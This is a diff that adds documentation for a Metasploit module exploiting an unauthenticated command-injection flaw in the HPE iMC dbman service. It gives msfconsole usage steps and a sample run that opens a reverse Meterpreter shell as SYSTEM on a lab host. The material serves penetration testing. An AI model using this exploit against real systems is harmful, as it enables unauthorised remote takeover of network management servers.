|
| 1 | +## Description |
| 2 | + |
| 3 | + This module exploits a remote command execution vulnerablity in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04. |
| 4 | + |
| 5 | + The dbman service allows unauthenticated remote users to restart a user-specified database instance (OpCode 10008), however the instance ID is not sanitized, allowing execution of arbitrary operating system commands as SYSTEM. This service listens on TCP port 2810 by default. |
| 6 | + |
| 7 | + |
| 8 | +## Vulnerable Application |
| 9 | + |
| 10 | + [HPE Intelligent Management Center Enterprise Software Platform](https://www.hpe.com/au/en/product-catalog/networking/intelligent-management-software/pip.hp-intelligent-management-center-enterprise-software-platform.4176520.html) is a comprehensive wired and wireless network management tool. |
| 11 | + |
| 12 | + This module has been tested successfully on: |
| 13 | + |
| 14 | + * iMC PLAT v7.2 (E0403) on Windows 7 SP1 (EN). |
| 15 | + |
| 16 | + Installer: |
| 17 | + |
| 18 | + * [iMC PLAT v7.2 (E0403) Standard](https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=) |
| 19 | + |
| 20 | + |
| 21 | +## Verification Steps |
| 22 | + |
| 23 | + 1. Start `msfconsole` |
| 24 | + 2. Do: `use exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce` |
| 25 | + 3. Do: `set RHOST <IP>` |
| 26 | + 4. Do: `run` |
| 27 | + 5. You should get a session |
| 28 | + |
| 29 | + |
| 30 | +## Scenarios |
| 31 | + |
| 32 | + ``` |
| 33 | + msf > use exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce |
| 34 | + msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > set rhost 172.16.191.166 |
| 35 | + rhost => 172.16.191.166 |
| 36 | + msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > check |
| 37 | + [*] 172.16.191.166:2810 The target service is running, but could not be validated. |
| 38 | + msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > set verbose true |
| 39 | + verbose => true |
| 40 | + msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run |
| 41 | +
|
| 42 | + [*] Started reverse TCP handler on 172.16.191.181:4444 |
| 43 | + [*] 172.16.191.166:2810 - Powershell command length: 6091 |
| 44 | + [*] 172.16.191.166:2810 - Sending payload (6091 bytes)... |
| 45 | + [*] Sending stage (179779 bytes) to 172.16.191.166 |
| 46 | + [*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:55316) at 2018-01-05 03:23:55 -0500 |
| 47 | +
|
| 48 | + meterpreter > getuid |
| 49 | + Server username: NT AUTHORITY\SYSTEM |
| 50 | + meterpreter > sysinfo |
| 51 | + Computer : WIN-SGBSD5TQUTQ |
| 52 | + OS : Windows 7 (Build 7601, Service Pack 1). |
| 53 | + Architecture : x64 |
| 54 | + System Language : en_US |
| 55 | + Domain : WORKGROUP |
| 56 | + Logged On Users : 3 |
| 57 | + Meterpreter : x86/windows |
| 58 | + ``` |
| 59 | + |
0 commit comments